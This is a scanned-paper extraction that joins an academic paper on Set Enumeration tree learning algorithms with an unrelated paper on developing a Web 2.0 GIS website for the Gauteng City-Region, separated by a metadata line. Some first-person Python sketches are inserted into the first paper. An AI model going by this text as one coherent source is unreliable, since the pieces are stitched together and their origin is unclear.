Many problems in Computer Science were formalized to admit solutions in the form of sets, or in the form of partial instantiations of a set of variables. Typically, such sets are required to satisfy some problem-specific criterion which designates them as solutions. In addition, where multiple solutions may exist, they are often ranked by their plausibility, likelihood, or desirability. Often, such a preference involves a minimality (or maximality) criterion, e.g. minimal entropy, maximum probability or utility, etc. Set Enumeration (SE) trees [Rymon, 92] were shown to be useful as the basis for a unifying search-based framework for such domains.
SE-trees support complete, irredundant, and prioritized search; their special structure allows for efficient pruning and other optimizations. Let ATTRS = \{A_i\}_{i=1}^n be a set of attributes with domains Dom(A_i) respectively, and let ind:ATTRS → INT be an indexing of the set of attributes. We define the SE-tree View of a partial description S as follows: \[ \text{View}(S) \overset{\text{def}}{=} \{ A \in \text{ATTRS} \mid \text{ind}(A) > \max_{A' \in S} \text{ind}(A') \} \] **Definition 3.1 Extended Set Enumeration Tree** The extended SE-tree for a set of attributes ATTRS is defined as follows: 1. At its root is a node labeled with the empty set; 2. Recursively, if S is a node's label, then its children are labeled as follows: \[ \{ S \cup \{A=v\} \mid A \in \text{View}(S), v \in \text{Dom}(A)\} \] **Example 3.2** Figure 1 depicts an extended SE-tree for the complete 3BIN space. Note that restricting a node's expansion to its View ensures that every partial description (and in particular every member of 3BIN) is explored exactly once within the tree. Representing all elements of a power-set, the complete SE-tree is clearly exponential in size. However, in a large class of problems, especially where solutions are monotonic with respect to set inclusion, the SE-tree can be used to induce a complete and yet efficient search because it allows for systematic pruning [Rymon, 92]. ![Figure 1: Complete SE-tree for 3 Binary Variables](image) 3.2 SE-TREE-BASED LEARNING Aimed at all kernel rules, SE-Learn (Algorithm 3.4) explores an imaginary SE-tree top-down. Nodes are explored by some predetermined priority function. In Sections 4 and 5, we show this prioritization useful in implementing various biases. In expanding open nodes, SE-Learn exploits the SE-tree structure to prune away nodes that cannot lead to kernel rules. SE-Learn’s output is an SE-tree whose leaves are labeled with kernel rules. **Definition 3.3 Candidate and Impotent Expansions** Let S be a node, \( \text{TSET}(S) \overset{\text{def}}{=} \{ t \in \text{TSET} \mid S \subseteq t \} \). We say that \( S' \overset{\text{def}}{=} S \cup \{A=v\} \) is a candidate expansion of S if \( A \in \text{View}(S), v \in \text{Dom}(A) \). However, \( S' \) is impotent if either 1. \( \text{TSET}(S') \) is empty; or 2. \( \text{TSET}(S')=\text{TSET}(S) \); or 3. all objects in \( \text{TSET}(S') \) agree on their assignment to attributes in \( \text{View}(S') \), but there is not a complete agreement on the class (i.e. S' is not a rule).

Algorithm 3.4 Program SE-Learn
1. OPEN-NODES ← {∅};
2. Until OPEN-NODES is empty do
3. Expand(Extract-Min(OPEN-NODES))

Procedure Expand(S)
1. For every candidate expansion $R \overset{\text{def}}{=} S \cup \{A=v\}$ that is not impotent and that is not subsumed by a previously discovered rule do
2. If $R$ is a rule then mark it as such; otherwise add it to OPEN-NODES.

The algorithm works by exploring nodes along the SE-tree's current fringe (OPEN-NODES) in a best-first fashion. For that purpose, nodes are cached in a priority queue and accessed via an Extract-Min operation. Candidate expansions that are not subsumed by previously discovered rules (step 1) are marked as rules if they satisfy the definition or otherwise marked for expansion and added to the queue for further consideration (step 2). 3.3 EXPLORATION POLICIES An exploration policy is simply the priority function used in Algorithm 3.4 to determine the order in which nodes are explored.
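The following Python sketch is one possible reading of Algorithm 3.4 (my own, not the paper's code); it reuses the matches and subsumes helpers from the earlier sketch, keeps OPEN-NODES in a heap-based priority queue, and takes the exploration policy as a priority function. Condition 3 of Definition 3.3 is omitted to keep the sketch short.

```python
import heapq
from itertools import count

# Assumes matches(partial, obj) and subsumes(r1, r2) from the earlier sketch.

def tset_of(s, tset):
    """TSET(S): the training examples whose objects match S."""
    return [(obj, label) for obj, label in tset if matches(s, obj)]

def view(s, index):
    """View(S): attributes whose index exceeds that of every attribute in S."""
    used = max((index[a] for a in s), default=-1)
    return [a for a in index if index[a] > used]

def se_learn(tset, domains, index, priority):
    """Best-first SE-Learn; `priority` is the exploration policy of Section 3.3."""
    rules, tie = [], count()
    open_nodes = [(priority({}), next(tie), {})]   # OPEN-NODES <- {empty set}
    while open_nodes:
        _, _, s = heapq.heappop(open_nodes)        # Extract-Min
        s_rows = tset_of(s, tset)
        for a in view(s, index):                   # candidate expansions of S
            for v in domains[a]:
                r = {**s, a: v}
                r_rows = tset_of(r, tset)
                if not r_rows or len(r_rows) == len(s_rows):   # impotent (1), (2)
                    continue
                if any(subsumes(k, r) for k in rules):         # already subsumed
                    continue
                if len({label for _, label in r_rows}) == 1:   # R is a rule
                    rules.append(r)
                else:                                          # keep expanding
                    heapq.heappush(open_nodes, (priority(r), next(tie), r))
    return rules
```

With priority=len, nodes are explored by cardinality, i.e. breadth-first over the SE-tree, which is the monotonic policy discussed next.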
It is easy to verify that if nodes are explored by their cardinality (breadth-first exploration of the tree) then the algorithm is correct, i.e. it computes all and only kernel rules. As so far described, any monotonic function $\psi$, i.e. one such that $S \subseteq S'$ implies $\psi(S) \leq \psi(S')$, results in Algorithm 3.4 being correct. A large class of interesting functions is monotonic, e.g. ones that are based on probability, utility, or information-gain measures. However, at some computational expense, SE-Learn can be modified to admit non-monotonic exploration policies as well. The sole purpose of the monotonicity restriction is to avoid recording non-minimal solutions; therefore, to remove it, we need to also check whether new rules subsume old ones. Note however that, as so far presented, all exploration policies will result in the same tree structure. The variety of exploration policies allowed will become important next, in specifying and implementing preference criteria. 4 CLASSIFICATION ALGORITHMS Given an SE-tree acquired as above, we want to be able to use it to classify new objects. As in decision tree-based classification algorithms, this is done by following matching paths from the root to class-labeled leaves (rules). Recall however that in the SE-tree representation 1. there may be no such leaf (rule) (we called this incompleteness); or 2. there may be multiple rules (and thus leaves) matching a given object, and they may not always be equally labeled (we called this inconsistency). The SE-tree incompleteness, we argued, is due to the incompleteness of the training data. One way to “complete” the SE-tree is to perform partial matching in cases where there are no perfectly matching rules. The inconsistency property, on the other hand, gives the SE-tree its main power. Roughly, inconsistency reflects a variety of perspectives that could be adopted to logically partition the training data. In a decision tree, a single such perspective is decided upon at the learning phase in the choice of attribute for each branching point. Representing multiple perspectives is more expressive and allows more principled resolution. In particular, hypothesis-space preference, explicitly specified by the user, can be used to resolve conflicts. Algorithm 4.1 uses such preferences directly: by searching the SE-tree best-first with respect to the specified preference, it picks the leaf which maximizes the specified preference from all those matching the object at hand. Algorithm 4.1 Classification via SE-tree Search - **Input:** (1) an object; (2) an SE-tree; and (3) an exploration policy $\psi$ (bias). - **Procedure:** Search the SE-tree best-first (according to $\psi$), along paths matching the object. Stop when the first leaf is hit, or when the tree is exhausted. - **Output:** If a leaf was hit, predict its class label. Otherwise, either respond “don’t know”, or guess, or re-search the tree allowing for partial matching. A more general approach involves specifying a resolution criterion, e.g. weighted averaging or voting, which takes into account all rules matching a given object. The two approaches can, of course, be combined by applying the resolution criterion to a subset of the rules – those which rank highest by the preference criterion. The following experiment, using the Monks benchmark [Thrun et al., 91], demonstrates the importance of the particular choice of resolution criterion. In general, a preference and/or a resolution criterion should reflect some domain knowledge.
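As an illustration only (my own sketch, under the same dict-based encoding as before), a resolution criterion of the weighted-voting kind takes a few lines of Python; the weight function is where a preference for more general or more specific rules is expressed, and the three generic weight functions evaluated in the Monks experiment below are instances of this scheme.

```python
# Assumes matches(partial, obj) from the earlier sketch; each rule is a
# (partial_description, class_label) pair.

def classify_by_voting(obj, rules, weight):
    """Resolution criterion: every rule matching `obj` casts a vote of
    strength weight(partial) for its class; returns None if nothing matches."""
    votes = {}
    for partial, cls in rules:
        if matches(partial, obj):
            votes[cls] = votes.get(cls, 0.0) + weight(partial)
    return max(votes, key=votes.get) if votes else None   # None = "don't know"

# Constant weights give simple voting; weights growing with len(partial)
# favor more specific rules, decreasing weights favor more general rules.
simple_voting = lambda partial: 1.0
```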
However, given the artificial nature of the Monks problems, we experimented with three generic weight functions: simple voting; quadratic (in the rule's size) weight voting, favoring more specific rules; and inverse quadratic, favoring more general rules. In the learning phase, we simply learned all kernel rules. In classification, when the rules were incomplete, we used partial matching. Conflicts were resolved using each of the three weight functions. Figure 2 compares accuracy obtained using each of the resolution criteria to each other; to the average reported for other decision tree-based programs and to the overall average reported for all methods. Note that SE-Learn's performance is crucially dependent on the resolution criterion used. <table> <thead> <tr> <th></th> <th>Monk1</th> <th>Monk2</th> <th>Monk3</th> </tr> </thead> <tbody> <tr> <td>SE-Learn (inv. quad.)</td> <td>85.9%</td> <td>71.3%</td> <td>95.6%</td> </tr> <tr> <td>SE-Learn (voting)</td> <td>72.6%</td> <td>69.0%</td> <td>88.4%</td> </tr> <tr> <td>SE-Learn (quadratic)</td> <td>64.8%</td> <td>67.1%</td> <td>70.8%</td> </tr> <tr> <td>Average decision trees</td> <td>84.2%</td> <td>67.6%</td> <td>86.9%</td> </tr> <tr> <td>Average overall</td> <td>88.9%</td> <td>76.4%</td> <td>90.9%</td> </tr> </tbody> </table> Figure 2: Various Resolution Criteria 5 BIAS IN THE LEARNING PHASE 5.1 PARTIALLY EXPLORED SE-TREES It may often be intractable, or practically impossible, to explore all kernel rules. Exploration policies can then be used as early as the learning phase to prune away less promising parts of the SE-tree. Even when all kernel rules can be explored, added complexity may not pay in the margin. Worse, as with many other learning frameworks, more complex SE-trees can even have lower accuracy than their simpler subsets. In such instances, it is standard to use hill-climbing procedures and/or anytime algorithms which explore as time/space permit and return the best classifier seen so far. In SE-Learn, the SE-tree can be constructed gradually while testing to make sure that the added complexity of new rules is worth the marginal improvement in accuracy. When interrupted, or when it runs out of resources (particularly space) this procedure will return the best classifier seen so far. The particular exploration policy used plays an important role in this procedure since it determines the order in which rule nodes are seen. Using again the Monks problems, we ran an experiment in which an SE-tree was explored level by level. The change in complexity (measured by the number of rules) and in accuracy (using the inverse quadratic resolution criterion) is depicted in Figure 3. 5.2 SPECIAL COLLECTIONS OF RULES In what follows, we briefly describe variations of SE-Learn that compute SE-trees corresponding to collections of rules with special features. Here too, the particular collection computed is determined by the exploration policy. Consistent Sub-Collections of KRULES A collection of kernel rules is inconsistent w.r.t. UNIVERSE iff it has rules \( R_1, R_2 \) such that \( \pi([R_1]) \neq \pi([R_2]) \) and no attribute appears in both \( R_1 - R_2 \) and \( R_2 - R_1 \). Thus, SE-Learn could be modified not to retain rules which are inconsistent with previously discovered rules. Since the order in which nodes are explored determines which rules are retained, the particular exploration policy used defines a bias. 
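The pairwise condition just stated translates directly into code; the following small check (a sketch under the same dict-based rule encoding assumed earlier) is what such a modified SE-Learn could use to decide whether a newly found rule clashes with a previously retained one.

```python
def conflicting(r1, c1, r2, c2):
    """Rules (r1 => c1) and (r2 => c2) are mutually inconsistent w.r.t.
    UNIVERSE iff they predict different classes and never disagree on a
    shared attribute (so no attribute appears in both r1-r2 and r2-r1),
    in which case some object of UNIVERSE matches both rules."""
    if c1 == c2:
        return False
    disagree = any(a in r2 and r2[a] != v for a, v in r1.items())
    return not disagree
```

A consistency-preserving variant of SE-Learn would then simply skip a new rule whenever conflicting(...) holds against any rule retained so far, making the retained collection depend on the exploration order, exactly the bias noted above.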
Minimal Sub-Collections of KRULES For TSET-completeness purposes, a rule \( R \) is redundant if every object in TSET that \( R \) matches is also matched by another rule \( R' \). As before, one can modify SE-Learn so as not to retain rules deemed redundant by previously discovered rules. Another alternative is to restrict redundancy to \( n \) rules per training instance, or to rules that satisfy some other acceptance criterion such as statistical significance. Again, the particular exploration policy defines a bias. Consistent and Complete Collections of Rules The down side of discarding inconsistent rules, as suggested above, is that the collection of rules obtained may be incomplete even w.r.t. TSET. To avoid this, rather than discarding such rules, SE-Learn can be modified to further expand them. The collection of rules so obtained are guaranteed to be complete. However, individual rules may no longer be kernel. Minimal and Consistent Collections By removing both inconsistent and redundant rules, one may get a minimal collection of rules that is both complete and consistent. 6 SE-TREE AND DECISION TREES A number of decision tree based algorithms have had an impact on machine learning research. Part of our purpose here is to convince researchers to look at the SE-tree as a more general alternative to decision trees. We devote this section to a broader comparison of the two data structures. 6.1 A FOREST OF DECISION TREES One way to view a decision tree is as an SE-tree in which every possible object has exactly one path along which it can be classified, i.e. an SE-tree that is consistent and complete w.r.t. \textsc{UNIVERSE}. Conversely, one way to view an SE-tree is as a collection, or forest, of decision trees. A single SE-tree can be shown to embed a large number of decision trees. In particular, let $D$ be a decision tree in which attributes were chosen monotonically w.r.t. some indexing function. Let $S$ be an SE-tree constructed in accordance to the same indexing function, then $S$ embeds $D$, i.e. there exists a subset of $S$'s edges which forms a tree that is topologically and semantically equivalent to $D$, and that is rooted at $S$'s root. One particular decision tree is the SE-tree's primary decision tree: the one in which each internal node is expanded with the first attribute in that node's SE-tree View that does not result in impotent expansions. This result can be strengthened to make the SE-tree embed any single decision tree\textsuperscript{2}. In particular, let $D$ be a decision tree that is constructed by any ID3-like procedure. To create an SE-tree that embeds $D$ we may have to slightly alter the definition of an SE-tree to allow for dynamic re-indexing. In particular, we will develop an indexing as we create the tree: 1. At first, we will choose an initial indexing $\text{ind}_{\text{root}}$ in which the first attribute used in $D$ appears first; 2. Then, while at a node labeled $S$, let $\text{ind}_{\text{parent}}(S)$ be the indexing used in expanding $S$'s parent. In $S$, we use an indexing which coincides with $\text{ind}_{\text{parent}}(S)$ on all attributes not in $\text{View}(S)$, but may re-order attributes in $\text{View}(S)$ as we wish. In particular, if a node corresponding to $S$ appears in $D$, we will re-order attributes in $\text{View}(S)$ so that the first attribute used in $D$ to split that node appears first. By construction, $D$ will be embedded in an SE-tree created as above as its primary decision tree. 
It is fairly easy to verify that the SE-tree remains complete and irredundant, and that SE-Learn remains correct. \textsuperscript{1}An SE-tree, however, can be consistent and complete without being a decision tree. \textsuperscript{2}Not all of them at once; rather a collection that includes a specific decision tree. 6.2 IMPROVING UPON A GIVEN DECISION TREE An important corollary of the result above is that one can construct an exploration policy under which SE-Learn will start off with one's favorite decision tree, and then try to improve it by adding more rule nodes. (This exploration policy may be non-monotonic though.) Of course, rule nodes will only be added to the extent to which accuracy (as tested empirically on a separate training set) is improved. We have tested this approach on the Monks benchmark. In each of the three problems, we started with a decision tree constructed by the information-gain criterion. Then, the rest of the SE-tree was explored breadth-first. Accuracy and complexity were recorded for the primary decision tree, and for each level of the tree in which rules were added (Figure 4). ![Figure 4: Starting from a Decision Tree](image) Note that in all three problems, the accuracy of the primary decision tree could be improved by adding SE-tree nodes, although this improvement is not monotonic. Also note that in Monk1, adding the SE-tree's first level has not only improved the accuracy, but has also reduced the number of rule nodes (some decision tree rules were pruned because they were subsumed by newly discovered rules). 6.3 HYPOTHESES EXPRESSIBILITY Consider the following problem instance: <table> <thead> <tr> <th>A</th> <th>B</th> <th>Class</th> </tr> </thead> <tbody> <tr> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>1</td> <td>1</td> <td>1</td> </tr> </tbody> </table> While four different hypotheses are consistent with this training data, there are only two ID3-style\textsuperscript{3} decision trees (Figure 5). \textsuperscript{3}There are more decision trees, but only these can be generated by an ID3-like procedure. The corresponding SE-tree contains (as a subset of its arcs) both trees, and can be used to represent all four hypotheses depending on the particular exploration policy (bias) used in a given classification session. Figure 5: SE-tree versus Decision Trees ((a) Decision Trees; (b) SE-Tree). Consider, for example, an OR function (not modeled by either decision tree). In SE-Learn, if a search-based approach to classification is adopted (Algorithm 4.1), an OR function can be implemented using an exploration policy that assigns high priority to the arcs A=1 and B=1. Generalizing this problem to n attributes, each taking its values from \{0, \ldots, n-1\}, we are given a training set with the n cases in which all attributes, and the class, are equally labeled.
Now, we consider a function that takes the most frequent value among its attributes, with bias towards higher values in case of equality (for n = 2, we get the OR function). Such a function cannot be modeled by any of the ID3-style decision trees\(^4\), but can easily be modeled using an SE-tree with a resolution criterion based on simple voting. ### 6.4 Computing Kernel Rules Considering the goal of computing all kernel rules, three problems may arise in a decision tree-based search framework: 1. The minimality problem – rules will often not be discovered in their minimal (kernel) form; 2. The multiplicity problem – each kernel rule may be discovered multiply, disguised in a number of its non-minimal supersets; and 3. The incompleteness problem – some kernel rules may not be discovered at all. Both the minimality problem and the multiplicity phenomenon result from the fact that attributes used high in the tree are necessary for some, but not all, of the rules. The minimality problem is often addressed by subsequently pruning the rules extracted from the decision tree (e.g. \cite{Quinlan87}). The replication problem, a special case of multiplicity in which whole sub-trees are replicated, has been addressed by several researchers (e.g. \cite{Rivest87, Pagallo09}). Incompleteness, which is only a problem if one is really interested in all kernel rules, results from the insistence on mutual exclusivity of any decision tree’s leaves (see \cite{Weiss91}). None of these problems occurs in the SE-tree-based framework: 1. Rules are always discovered in their kernel form; 2. Kernel rules are always discovered uniquely; and 3. All kernel rules are discovered. ### 6.5 Complexity The SE-tree’s exhaustiveness and large initial branching may be deceiving. Let us first compare its worst-case complexity to that of a decision tree, independently of their use. **Proposition 6.1** If all attributes are b-valued, then the number of nodes in a complete decision tree is \(b^n + b^{n-1} + \cdots + b + 1 > b^n\). The size of a complete SE-tree is \((b + 1)^n\). In sharp contrast, the size of a super-tree containing all decision trees is significantly larger: \(b^n \cdot n!\). (For instance, with \(b = 2\) and \(n = 3\), these three counts are 15, 27, and 48 nodes, respectively.) Within an induction framework, however, one rarely explores a complete decision tree (or a complete SE-tree, for that matter). In an ID3-like framework, the size of a decision tree is linear in the size of the training data. This is not true of SE-Learn! Kernel rules are close relatives of prime implicants, and as such we know of pathological examples in which the number of kernel rules is exponential in the size of the training data. On the other hand, as just explained, one does not have to explore the entire SE-tree and one can always have the first nodes explored be those of one’s favorite decision tree. ### 7 Conclusion and Future Research Directions We have proposed an inductive learning framework which uses an SE-tree as a basis for search and classifier representation and have presented a family of algorithms for SE-tree induction and for SE-tree-based classification. We have shown that as a representation for classifiers, SE-trees generalize decision trees in two ways: first, a decision tree is a special case of an SE-tree, and second, an SE-tree contains many decision trees. An SE-tree can also be built by improving upon one’s favorite decision tree. However, unlike decision trees, most of the search bias can be eliminated in SE-tree-based algorithms; an independently specified hypothesis-space bias can be used instead.
Importantly, the SE-tree-based framework can borrow from techniques developed for decision trees. In particular 1. More expressive representation languages can be adopted, e.g. ordered and hierarchical variables, multi-variable tests, class probability trees, etc. Discretization techniques, and criteria developed for selecting a splitting test can be used to handle ordered variables; averaging and smoothing techniques can be used in conjunction with class probabilities representation. 2. Pruning techniques developed for decision trees, e.g. using statistical significance tests, can also be used in SE-trees. 3. Entropy-minimization and other criteria developed for selecting the next splitting attribute in decision trees will likely be useful in selecting an indexing function for an SE-tree which will minimize the number of nodes that have to be explored. More research, however, is needed to figure ways in which these techniques can be deployed effectively. Other areas of future research include general and domain-specific exploration policies and resolution criteria, termination criteria suitable for various tradeoffs between accuracy and time/space, and an incremental version of SE-Learn. Recent advances in search algorithms lend themselves to improved implementation of the SE-tree-based framework, e.g. linear-space best-first search algorithms [Korf, 92, Russell, 92] and a SIMD version of IDA* [Powley et al., 93]. Acknowledgements The idea of using the SE-trees to learn rules originated at a talk by Tom Mitchell — I thank him for that, as well as for later suggestions. I also thank Kevin Atteson, Russ Greiner, Haym Hirsh, Alon Luss, Teow-Hin Ngair, Michael Niv, Greg Provan, Philip Resnik, Nick Short, Scott Weinstein, and anonymous reviewers for commenting on previous drafts. This work was supported in part by a graduate fellowship ARO grant DAAL03-89-C0031PRI. References
{"Source-Url": "http://repository.upenn.edu/cgi/viewcontent.cgi?article=1284&context=cis_reports", "len_cl100k_base": 8029, "olmocr-version": "0.1.48", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 32724, "total-output-tokens": 9423, "length": "2e12", "weborganizer": {"__label__adult": 0.0004220008850097656, "__label__art_design": 0.0005345344543457031, "__label__crime_law": 0.0005207061767578125, "__label__education_jobs": 0.002826690673828125, "__label__entertainment": 0.00012028217315673828, "__label__fashion_beauty": 0.00028324127197265625, "__label__finance_business": 0.0005116462707519531, "__label__food_dining": 0.0004570484161376953, "__label__games": 0.0007877349853515625, "__label__hardware": 0.0013675689697265625, "__label__health": 0.0011816024780273438, "__label__history": 0.0003817081451416016, "__label__home_hobbies": 0.0001959800720214844, "__label__industrial": 0.0007395744323730469, "__label__literature": 0.0005202293395996094, "__label__politics": 0.0003981590270996094, "__label__religion": 0.000637054443359375, "__label__science_tech": 0.2802734375, "__label__social_life": 0.00016200542449951172, "__label__software": 0.01529693603515625, "__label__software_dev": 0.69091796875, "__label__sports_fitness": 0.0004291534423828125, "__label__transportation": 0.0007100105285644531, "__label__travel": 0.0002371072769165039}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 35400, 0.03953]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 35400, 0.58603]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 35400, 0.89879]], "google_gemma-3-12b-it_contains_pii": [[0, 557, false], [557, 1068, null], [1068, 1319, null], [1319, 5232, null], [5232, 9804, null], [9804, 13245, null], [13245, 17842, null], [17842, 22102, null], [22102, 26496, null], [26496, 31403, null], [31403, 35400, null]], "google_gemma-3-12b-it_is_public_document": [[0, 557, true], [557, 1068, null], [1068, 1319, null], [1319, 5232, null], [5232, 9804, null], [9804, 13245, null], [13245, 17842, null], [17842, 22102, null], [22102, 26496, null], [26496, 31403, null], [31403, 35400, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 35400, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 35400, null]], "pdf_page_numbers": [[0, 557, 1], [557, 1068, 2], [1068, 1319, 3], [1319, 5232, 4], [5232, 9804, 5], [9804, 13245, 6], [13245, 17842, 7], [17842, 22102, 8], [22102, 26496, 9], [26496, 31403, 10], [31403, 35400, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 35400, 0.04889]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
36920b6bef0836610850057c5fcb87562e678b23
Developing a Web 2.0 GIS website for the Gauteng City-Region C.D. Wray Gauteng City-Region Observatory Partnership of the University of Witwatersrand, University of Johannesburg and Gauteng Provincial Government South Africa chris.wray@gcro.ac.za Abstract Successful Web GIS (Geographical Information System) applications are achieved by the right combination of GIS layers symbolised in a visually dynamic way, with an easy to use application, that is stable and responsive and meets the user requirements of both GIS and non-GIS users. Web 2.0 has produced a flood of development starter kits, sample viewers and APIs (Application Programming Interface), with the result that almost anyone involved in GIS or IT (Information Technology) – even with limited or no programming experience – can build a GIS website. This has lead to an exponential growth of Web GIS applications and data, which although a necessary step in increasing accessibility to spatial data and GIS applications, may result in online mapping applications that do not satisfy user requirements. The Gauteng City-Region Observatory (GCRO) identified a business need to develop a Web 2.0 GIS website to enable users to attain a better understanding of the Gauteng City-Region (GCR). The website makes use of data mashups to integrate data from various sources, and is one of the first government GIS websites in South Africa to utilise open datasets such as Google Maps to provide the base data. The website was built using rich Internet application (RIA) technology provided by the ESRI Adobe Flex viewer to offer an enhanced user experience, with popup windows and dynamic graphs linked to the maps. A five step Web GIS development methodology was employed to build the GCRO GIS website. This paper will examine each of the GIS development design steps that were followed to ensure an optimal functioning application, with responsive and secure map services. Specific Web mapping optimisation techniques, such as applying specific cartographic techniques and map designs to assist in overcoming the additional layer of Web design complexity introduced by spatial data will be reviewed. Keywords: Web 2.0, Web GIS, g-government 1. Introduction Worldwide there has been an explosion of Web 2.0 applications with Internet users embracing applications such as MySpace, Flickr, You Tube, Facebook and Twitter. The 2010 statistics are staggering with over 500 million active users on Facebook (Facebook, 2010) and 190 million users tweeting 65 million times a day on Twitter (Schonfeld, 2010). Prior to Web 2.0, people could access information off the Internet but did not really participate in its evolution (Townes, 2006), i.e. the Web consisted mainly of static Web pages. Web 2.0 in contrast, represents the second generation of Web development and design with new Web applications that enable improved interaction, communication, interoperability and sharing on the Web (Wikipedia contributors, 2009). Web 2.0 is not just about new technologies such as blogs and wikis, it represents a shift in culture that views the Internet as a platform for deploying services, rather than merely a source of information from static Web pages (Hughes, Macmillan & Medd, 2008). Web 2.0 promotes the principles of sharing, collaboration and data integration on the Internet. Web GIS refers to any GIS (Geographic Information System) application that uses Web technologies to communicate between components such as the Web GIS server and a Web browser, desktop or mobile client (Fu & Sun, 2011a:13). 
Web GIS applications have evolved to support the Web 2.0 principles of rich graphic user interfaces, user participation and data mashups, with commercial mapping applications such as Google Maps, Google Earth, Microsoft Bing Maps, Yahoo Maps and MapQuest, considered to be good examples of Web 2.0 (Fu & Sun, 2011a:10). The growth of Web GIS and online maps is impressive with nearly a billion people having used Google Maps, and at least 500 million downloaded Google Earth (O’Doherty, 2010). However, Murugesan (2007:41) cautions that although Web 2.0 applications have enabled better, faster and richer applications, it also poses a new design and development dilemma: “fast and easy versus well designed and well engineered”. Various open source applications and widgets, small stand-alone applications embedded in third party sites and originally derived from the idea of code re-use (Wikipedia contributors, 2011), are freely available online. Inexperienced developers can easily build applications by copying source code from existing websites or integrating widgets and modifying sample viewers (Rudman, 2010: 217). This “wave of cookie-cutter sites emerging on the Internet”, have been built and deployed, with in many cases very little thought to originality and user interaction with the site (Noyle & Bouwman, 2010:42). Not only is there a danger of good Web design practices being ignored, but developers may, according to Rudman (2010: 217), unknowingly incorporate malicious code into their applications, giving rise to security weaknesses. GIS applications add a further layer of Web design complexity in terms of appropriate cartographic techniques and map design. Web maps have different requirements to traditional maps, as complex detailed Web GIS maps will not be easily understood by users or result in frustratingly slow downloads. Users have grown used to simple map interfaces and fast map downloads from mapping sites such as Google Maps and Bing Maps. Successful and simple to use online maps often means making compromises and resisting classical GIS interfaces which only GIS professionals will understand (Diacono, 2009). A good public mapping website, according to Charlie Savage, founder of social mapping website Mappbuzz, has to be: “the obvious things – fast, intuitive, easy to navigate, nice graphic design – but it shouldn’t overwhelm the user, either with data or unfamiliar concepts” (Diacono, 2009). In January 2010, the GCRO (Gauteng City-Region Observatory) embarked on a project to develop an interactive GIS website for the Gauteng City-Region (GCR). The GCRO is a partnership between the Gauteng Provincial Government (GPG), the University of Johannesburg (UJ) and University of the Witwatersrand, Johannesburg (Wits); with local government also represented on the GCRO board. Behind the motivation for setting up the GCRO is a vision for a fast growing and dynamic GCR, which through better planning and management, and in particular improved co-operative government relations between all spheres of government, will become more functionally integrated, spatially coherent, globally competitive, economically productive, environmentally sustainable and socially inclusive. The GCRO recognised the need to provide online spatial information and GIS tools to develop a better understanding of the GCR, assist the GCR policy-makers to make better informed decisions and open up public access to government datasets. 
This business need was met through the development of the GCRO GIS website that provided a g-government solution for the GCRO and its provincial and local government stakeholders. G-government relates to the use of maps, the Internet (and more recently Web 2.0 technologies) and GIS to create more effective government service delivery (Thomas, 2001; Tickner, 2009). The website makes use of Web 2.0 technologies such as data mashups to integrate data from various sources. It is one of the first government GIS websites in South Africa to utilise open datasets such as Google Maps to provide the base data, and was built using rich Internet technology (RIA) provided by the ESRI Adobe Flex viewer to offer an enhanced user experience, with popup windows and dynamic graphs linked to the maps. This paper will discuss a Web 2.0 GIS development methodology, with specific reference to the GCRO GIS website and use of ESRI ArcGIS Server Web GIS software. It is important to note that this paper is derived from a Masters research project at the School of Electrical and Information Engineering, Wits (Wray, 2011). Another paper which also draws on the Masters research, but is focused on the use of user- and usage-centric design methodologies and discusses the Technology Acceptance Model (TAM) survey results conducted at the completion of the prototype and website launch, has been prepared for the IEEE Africon 2011 conference. 2. A Web 2.0 GIS design methodology Agrios (2009:44) argues that “effective Web maps have a specific focus and are designed so users can interact with them to accomplish meaningful tasks”. In order to achieve this, a five step methodology for developing an effective Web GIS map application with optimal performance, was used to design and build the GCRO GIS website. This methodology is depicted in Figure 1 and each of the steps will be considered in more detail. 2.1 Step 1: Think about the application and its users Step 1 is an obvious starting point when planning a GIS website, but should be considered carefully in terms of a number of questions to be used as a guide for planning a map-based Web application: - “What is the business need/purpose of the Web mapping application? - Who are the end users? - Is this an internal or external website? - What data will be included in the application? - How will the data be used? Visualisation? Spatial query? Attribute query? - Will the data be used with other services to create a mashup?” (Agrios, 2009:44) These questions were debated during a brainstorming session with GCRO staff held in January 2010. This process assisted GCRO to think about the GCRO GIS website users and how the application could benefit them – important considerations prior to drawing up a GIS website specification. The business need was identified as: enabling users to develop a better understanding of the GCR by providing base data and thematic layers offering different perspectives of the GCR, such as population distribution, poverty and the latest 2009 Quality of Life survey results as Web maps and dynamic graphs; and GIS analysis tools for the user to make better informed decisions and policies regarding the future development of the GCR. The main users of the application were identified as the GCRO staff and stakeholders, namely: the GPG Planning Commission, GPG Office of the Premier, GPG Department of Economic Development, local government officials and other GCR government agencies. 
